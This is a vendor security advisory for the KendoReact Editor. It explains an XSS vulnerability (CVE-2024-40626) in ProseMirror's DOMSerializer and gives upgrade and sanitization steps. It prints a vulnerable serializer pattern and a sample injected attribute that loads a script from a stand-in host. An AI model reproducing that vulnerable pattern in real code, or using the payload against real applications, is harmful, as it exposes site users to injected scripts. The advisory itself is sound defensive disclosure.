Protect your application from an XSS vulnerability in the ProseMirror Engine
Environment
| Product Version | Prior to 8.2.0 |
| Product | Progress® KendoReact Editor |
Description
We want to bring your attention to a critical security issue that may affect your use of the KendoReact Editor component, especially if you've customized its schema using ProseMirror. This article explains the Cross-Site Scripting (XSS) vulnerability that exists and provides steps to mitigate the risk.
A Cross-Site Scripting (XSS) vulnerability, identified as CVE-2024-40626, has been found in ProseMirror's DOMSerializer. This vulnerability could expose your application to malicious attacks if you are customizing the KendoReact Editor's schema by creating custom nodes or marks, particularly in versions prior to 8.2.0.
This KB article also answers the following questions:
- How to prevent XSS vulnerabilities in KendoReact Editor?
- How to secure a custom ProseMirror schema from XSS attacks in KendoReact Editor?
- What is the CVE-2024-40626 vulnerability in KendoReact Editor, and how to fix it?
Problematic Scenario
Imagine you're adding a custom node type to the KendoReact Editor. Without thorough validation and sanitization, a malicious user could craft input that, once serialized by ProseMirror, injects a script that runs in your users' browsers, leading to significant security issues.
The vulnerable pattern is a node or mark serializer function (e.g., a toDOM spec or a function passed to the DOMSerializer) that places a value from an attribute directly into the array used to describe the DOM structure:
```javascript
// Vulnerable: node.attrs.label is emitted as-is into the DOMOutputSpec array
(node) => ['span', node.attrs.label];
```
An attacker could inject something like attrs: {label: ["script", {src: "//dodgy.com/script.js"}]} into your document through a tampered API request. Because the DOMSerializer interprets a nested array as an element description rather than as text, it might then emit arbitrary HTML tags, which could lead to malicious code being executed when the content is rendered by the browser.
Solution
- Upgrade to KendoReact Editor 8.2.0 or a later version. The XSS vulnerability has been fixed in version 8.2.0. To protect your application, you should upgrade to this version or any later release.
- Sanitize the input. Even after upgrading, you should continue to follow best practices for sanitizing and validating all user input. If you have extended the editor's schema with custom nodes, ensure the data is sanitized both when it's entered (for example, when a document arrives from an API request) and when it's serialized into the DOM.
- Review any custom nodes or marks you have added. Be especially cautious with features involving user-generated content. Handling untrusted input without proper sanitization can expose your application to XSS attacks.